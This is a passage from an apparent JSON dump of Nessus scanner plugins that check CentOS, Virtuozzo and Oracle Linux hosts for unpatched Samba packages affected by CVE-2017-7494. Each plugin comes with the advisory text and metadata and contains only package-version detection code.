reference:\"samba-winbind-clients-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-winbind-modules-4.4.4-14.el7_3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctdb / ctdb-tests / libsmbclient / libsmbclient-devel / libwbclient / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:14:25", "description": "An update for samba4 is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.", "edition": 34, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-13T00:00:00", "title": "Virtuozzo 6 : samba4 / samba4-client / samba4-common / samba4-dc / etc (VZLSA-2017-1271)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2017-07-13T00:00:00", "cpe": ["p-cpe:/a:virtuozzo:virtuozzo:samba4-common", "p-cpe:/a:virtuozzo:virtuozzo:samba4-test", "p-cpe:/a:virtuozzo:virtuozzo:samba4", "p-cpe:/a:virtuozzo:virtuozzo:samba4-python", "p-cpe:/a:virtuozzo:virtuozzo:samba4-winbind-clients", "p-cpe:/a:virtuozzo:virtuozzo:samba4-winbind", "p-cpe:/a:virtuozzo:virtuozzo:samba4-dc", "p-cpe:/a:virtuozzo:virtuozzo:samba4-client", "p-cpe:/a:virtuozzo:virtuozzo:samba4-pidl", "cpe:/o:virtuozzo:virtuozzo:6", "p-cpe:/a:virtuozzo:virtuozzo:samba4-devel", "p-cpe:/a:virtuozzo:virtuozzo:samba4-dc-libs", "p-cpe:/a:virtuozzo:virtuozzo:samba4-libs", "p-cpe:/a:virtuozzo:virtuozzo:samba4-winbind-krb5-locator"], "id": "VIRTUOZZO_VZLSA-2017-1271.NASL", "href": "https://www.tenable.com/plugins/nessus/101473", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101473);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-7494\"\n );\n\n script_name(english:\"Virtuozzo 6 : samba4 / samba4-client / samba4-common / samba4-dc / etc (VZLSA-2017-1271)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for samba4 is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-1271.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?28840624\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017-1271\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected samba4 / samba4-client / samba4-common / samba4-dc / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:6\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 6.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"samba4-4.2.10-10.vl6\",\n \"samba4-client-4.2.10-10.vl6\",\n \"samba4-common-4.2.10-10.vl6\",\n \"samba4-dc-4.2.10-10.vl6\",\n \"samba4-dc-libs-4.2.10-10.vl6\",\n \"samba4-devel-4.2.10-10.vl6\",\n \"samba4-libs-4.2.10-10.vl6\",\n \"samba4-pidl-4.2.10-10.vl6\",\n \"samba4-python-4.2.10-10.vl6\",\n \"samba4-test-4.2.10-10.vl6\",\n \"samba4-winbind-4.2.10-10.vl6\",\n \"samba4-winbind-clients-4.2.10-10.vl6\",\n \"samba4-winbind-krb5-locator-4.2.10-10.vl6\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-6\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:51:24", "description": "From Red Hat Security Advisory 2017:1271 :\n\nAn update for samba4 is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.", "edition": 36, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-25T00:00:00", "title": "Oracle Linux 6 : samba4 (ELSA-2017-1271) (SambaCry)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-25T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:samba4-dc", "p-cpe:/a:oracle:linux:samba4-devel", "p-cpe:/a:oracle:linux:samba4-dc-libs", "p-cpe:/a:oracle:linux:samba4-winbind-krb5-locator", "p-cpe:/a:oracle:linux:samba4-client", "p-cpe:/a:oracle:linux:samba4-pidl", "p-cpe:/a:oracle:linux:samba4-winbind-clients", "p-cpe:/a:oracle:linux:samba4-common", "p-cpe:/a:oracle:linux:samba4-winbind", "p-cpe:/a:oracle:linux:samba4-python", "p-cpe:/a:oracle:linux:samba4-test", "p-cpe:/a:oracle:linux:samba4-libs", "p-cpe:/a:oracle:linux:samba4"], "id": "ORACLELINUX_ELSA-2017-1271.NASL", "href": "https://www.tenable.com/plugins/nessus/100397", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:1271 and \n# Oracle Linux Security Advisory ELSA-2017-1271 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100397);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-7494\");\n script_xref(name:\"RHSA\", value:\"2017:1271\");\n\n script_name(english:\"Oracle Linux 6 : samba4 (ELSA-2017-1271) (SambaCry)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:1271 :\n\nAn update for samba4 is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-May/006925.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"samba4-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-client-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-common-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-dc-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-dc-libs-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-devel-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-libs-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-pidl-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-python-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-test-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-clients-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-krb5-locator-4.2.10-10.el6_9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / samba4-dc-libs / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:31:15", "description": "An update for samba4 is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.", "edition": 38, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-26T00:00:00", "title": "CentOS 6 : samba4 (CESA-2017:1271) (SambaCry)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-26T00:00:00", "cpe": ["p-cpe:/a:centos:centos:samba4-common", "p-cpe:/a:centos:centos:samba4-libs", "cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:samba4-pidl", "p-cpe:/a:centos:centos:samba4-winbind-krb5-locator", "p-cpe:/a:centos:centos:samba4-client", "p-cpe:/a:centos:centos:samba4-dc", "p-cpe:/a:centos:centos:samba4-devel", "p-cpe:/a:centos:centos:samba4-winbind", "p-cpe:/a:centos:centos:samba4", "p-cpe:/a:centos:centos:samba4-winbind-clients", "p-cpe:/a:centos:centos:samba4-dc-libs", "p-cpe:/a:centos:centos:samba4-test", "p-cpe:/a:centos:centos:samba4-python"], "id": "CENTOS_RHSA-2017-1271.NASL", "href": "https://www.tenable.com/plugins/nessus/100429", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1271 and \n# CentOS Errata and Security Advisory 2017:1271 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100429);\n script_version(\"3.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-7494\");\n script_xref(name:\"RHSA\", value:\"2017:1271\");\n\n script_name(english:\"CentOS 6 : samba4 (CESA-2017:1271) (SambaCry)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for samba4 is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-May/022418.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?56ca4818\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7494\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-client-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-common-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-dc-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-dc-libs-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-devel-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-libs-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-pidl-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-python-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-test-4.2.10-10.el6_9\")) flag++;\nif 